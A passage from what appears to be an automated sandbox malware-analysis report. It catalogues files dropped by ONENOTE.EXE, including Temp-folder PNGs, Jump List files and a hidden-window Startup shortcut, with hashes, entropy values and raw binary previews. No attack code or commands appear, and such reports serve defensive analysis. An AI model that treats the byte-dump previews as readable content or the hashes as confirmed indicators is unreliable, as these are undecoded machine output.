                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F46A4AE5-A39A-43AF-81DB-521AFED12AF6}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F6172824-ADF3-4A78-9C37-B133FC2E311E}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F6B88B52-F15B-486C-AB4B-08C5D35BEF52}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F7622A2F-45D2-4C64-AA90-3671FA5ED9C3}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F9E3449E-C09A-4A7A-87CF-B1C510EFDC89}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{FCE15DBA-48E9-480E-94EE-B9EB5247B84C}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{FDB239FB-1C47-4080-8BB0-A6D24B0C45D0}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{FE40BFBE-172C-4E35-8C28-CE9012A42E30}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3873
                                                                                                                                                                                                          Entropy (8bit):3.4769849539362796
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:Se8rO0dO5JWDuIFRbqzqgdCDDGTCDwfpd5rO0dO5JWDuh7+5DGqzWk7dCDGWG5CH:S6bIDzmqfGNfpibIDHLZhdQs4
                                                                                                                                                                                                          MD5:5F3F057564231FCB1032D939CBD58969
                                                                                                                                                                                                          SHA1:3DBB912A26A7892243271661A351777960F14429
                                                                                                                                                                                                          SHA-256:E8EB84B4CEDBBE60904CFD1D83871881C7395A1AA937C83D0B653F9CDD094CAB
                                                                                                                                                                                                          SHA-512:E0CF9628424DB200A640C827183148A50DFE919B3C6E7A7D4AEEB5B638487FD716A93508274D56970D97B818C723D743AB73464045BBC1B6D86E2981D9020DEC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...................................FL..................F.@.. .....Q{.....A..X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U4m..PROGRA~2.........L.qV.B....................V.....7<R.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV.B.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV.B.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV.B....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VVTC1JHAS0HMDSK5LMNZ.temp

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3873
                                                                                                                                                                                                          Entropy (8bit):3.4769849539362796
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:Se8rO0dO5JWDuIFRbqzqgdCDDGTCDwfpd5rO0dO5JWDuh7+5DGqzWk7dCDGWG5CH:S6bIDzmqfGNfpibIDHLZhdQs4
                                                                                                                                                                                                          MD5:5F3F057564231FCB1032D939CBD58969
                                                                                                                                                                                                          SHA1:3DBB912A26A7892243271661A351777960F14429
                                                                                                                                                                                                          SHA-256:E8EB84B4CEDBBE60904CFD1D83871881C7395A1AA937C83D0B653F9CDD094CAB
                                                                                                                                                                                                          SHA-512:E0CF9628424DB200A640C827183148A50DFE919B3C6E7A7D4AEEB5B638487FD716A93508274D56970D97B818C723D743AB73464045BBC1B6D86E2981D9020DEC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...................................FL..................F.@.. .....Q{.....A..X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U4m..PROGRA~2.........L.qV.B....................V.....7<R.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV.B.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV.B.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV.B....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Fri Mar 17 07:23:29 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1251
                                                                                                                                                                                                          Entropy (8bit):4.650673666781962
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:8vKo2rOAbdOEIK4WDjCh7+RAyNqzWFUTdCDhxYUULze1zek7aB6m:8vKrO0dO5JWDuh7+iGqzWFwdCDtdQhB6
                                                                                                                                                                                                          MD5:6655BFA3E8905835531681FC863C2D61
                                                                                                                                                                                                          SHA1:6C7740444F0740EB136087A8910B7F366AF9095B
                                                                                                                                                                                                          SHA-256:420DE09C00610043C04FDCD791D10238DC2D9A97F73D16E5E2A4DACBD151CF6E
                                                                                                                                                                                                          SHA-512:78715DFF41FEDBDA84A4102B851897E7E59E0CC55138576E4086B7E19EB0D153DEEBCF50A03D31857E078AB9781AF8155F5A3B158FFEB315005BEABB2CBBA164
                                                                                                                                                                                                          Malicious:false
